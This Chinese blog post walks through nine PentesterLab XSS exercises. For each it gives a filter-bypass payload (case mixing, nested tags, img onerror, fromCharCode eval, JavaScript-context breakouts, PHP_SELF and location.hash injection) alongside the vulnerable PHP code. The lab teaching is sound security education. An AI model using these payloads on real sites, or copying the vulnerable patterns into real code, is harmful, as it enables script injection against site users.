pentesterlab简介
pentesterlab官方定义自己是一个简单又十分有效学习渗透测试的演练平台。
pentesterlab环境搭建
官方提供了一个基于debian6的镜像,官网下载镜像,使用vmware建立一个虚拟机,启动即可。
ps:官方文档建议做一个host绑定,方便后面使用
windows下hosts文件目录:C:\Windows\System32\Drivers\etc\hosts,打开后添加以下一行
192.168.1.100 vulnerable # 具体ip可以在虚拟机中使用ifconfig查看
xss分析
第一个xss非常简单,直接输入即可
// <script>alert(1);</script>
http://vulnerable/xss/example1.php?name=%3Cscript%3Ealert(1)%3C/script%3E
它对应的代码如下
<?php
echo $_GET["name"];
?>
第二个xss过滤了小写的<script>与</script>,可以使用大小写绕过
// <sCript>alert(1);</scrIpt>
http://vulnerable/xss/example2.php?name=%3CsCript%3Ealert(1);%3C/scrIpt%3E
它对应的代码如下
<?php
$name = $_GET["name"];
$name = preg_replace("/<script>/", "", $name);
$name = preg_replace("/<\/script>/", "", $name);
echo $name;
?>
第三个xss过滤了不区分大小写的<script>与</script>,可以使用嵌套的script标签绕过
// <sCr<scriPt>ipt>alert(1)</scr</scRipt>Ipt>
http://vulnerable/xss/example3.php?name=%3CsCr%3CscriPt%3Eipt%3Ealert(1)%3C/scr%3C/scRipt%3EIpt%3E
它对应的代码如下
<?php
$name = $_GET["name"];
$name = preg_replace("/<script>/i", "", $name);
$name = preg_replace("/<\/script>/i", "", $name);
echo $name;
?>
第四个xss判断包含script字符串即报错,可以使用img标签绕过
// <img src='a' onerror='alert(1)' />
http://vulnerable/xss/example4.php?name=%3Cimg%20src='a'%20onerror='alert(1)'%20/%3E
它对应的代码如下
<?php
if(preg_match('/script/i', $_GET["name"])) {
die("error");
}
?>
第五个xss判断包含alert字符串即报错,@_@,可以使用编码方式绕过
// <iMg src=N onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,112,111,114,117,105,110,39,41))">
http://vulnerable/xss/example5.php?name=%3CiMg%20src=N%20onerror=%22eval(String.fromCharCode(97,108,101,114,116,40,39,112,111,114,117,105,110,39,41))%22%3E
它对应的代码如下
<?php
if(preg_match('/alert/i', $_GET["name"])) {
die("error");
}
?>
第六个xss直接在js环境中输出php变量,可以通过构造js脚本绕过
// ";b=alert(1);eval(b);//
http://vulnerable/xss/example6.php?name=%22;b=alert(1);eval(b);//
它对应的代码如下
<script>
var $a = "<?php echo $_GET["name"]; ?>";
<script>
第七个xss在js环境中输出通过html编码的php变量,htmlentities没有过滤单引号,使用单引号绕过
// ';b=alert(1);eval(b);//
http://vulnerable/xss/example7.php?name=';b=alert(1);eval(b);//
它对应的代码如下
<script>
var $a = "<?php echo htmlentities($_GET["name"]); ?>";
<script>
第八个xss的post地址使用了当前url,构造当前url地址达到xss目的
// /"method="POST"><script>alert(1)</script>
http://vulnerable/xss/example8.php/%22method=%22POST%22%3E%3Cscript%3Ealert(1)%3C/script%3E
它对应的代码如下
<?php
if(isset($_POST["name"])) {
echo "HELLO ".htmlentities($_POST["name"]);
}
?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
Your name:<input type="text" name="name" />
<input type="submit" name="submit" />
第九个xss直接在页面输出锚点id,构建一个带xss的锚点即可
// #<script>alert(1)</script>
http://vulnerable/xss/example9.php#<script>alert(1)</script>
它对应的代码如下
<script>
document.write(location.hash.substring(1));
</script>
原创文章http://tinyhema.iteye.com/blog/2003605,转载请注明。
分享到:
相关推荐
前端顽疾--XSS漏洞分析与解决.ppt
XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描
百度编辑器解决xss漏洞
一种基于DOM随机性的XSS漏洞动态检测方法,高灵杰,辛阳,XSS漏洞是Web应用程序威胁最大的安全漏洞之一。传统的XSS漏洞扫描工具并没有对现代Web应用程序常用的异步数据传输以及动态内容进行针
近期公司的项目遭受了SQL+XSS攻击(市面上现在检测工具很多如:AWVS/360等),现贴出项目中的修复核心代码,需要的可以参考一下
论文《基于网络爬虫的SQL注入与XSS漏洞挖掘》
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
跨网站脚本(Cross-site scripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类...
java配置xssproject,文件包括配置步骤,需要的jar包,完整的xssproject类,并且提供的类解决了multipart/form-data类型的Request请求xss过滤问题
自动化检测XSS漏洞插件,希望对大家使用有帮助,一起进步,一起分享
我刚入行的时候做过一个小小的页面工具,其中有一个步骤是把一些代码输出到页面上,当时我用的是php做的,写了个for循环,读取每一行的内容,然后echo出来。但是我发现页面排版老是那么的乱,怎么缩进都没有了?...
007-Web安全基础3 - XSS漏洞
tsrc线上培训 第五第六式web安全之xss漏洞、命令执行漏洞专题
xss平台搭建源码,用于练习xss漏洞,适用于网络安全学科的爱好者和学生,下载后解压缩到www目录下,需要将xss-sql导入数据库,并更改一下源码部分内容,很容易。最后要配置伪静态文件。
跨站脚本(Cross site script,简称xss)是一种“HTML注入”,由于攻击的脚本多数时候是跨域的,所以称之为“跨域脚本”。 我们常常听到“注入”...可以通过导入以下两个jar,通过配置实现xss漏洞修复,无需修改代码
从测试XSS漏洞,教你如何测试安全漏洞,打开文档有详细步骤
Dedecms会员功能shops_delivery.php中的 des 参数存在存储型XSS漏洞,攻击者可利用漏洞获得用户测试环境:DedeCMS-V5.7-U
xss漏洞,网站安全编程,黑客编程 ASM C/C++ C# .NET LAMP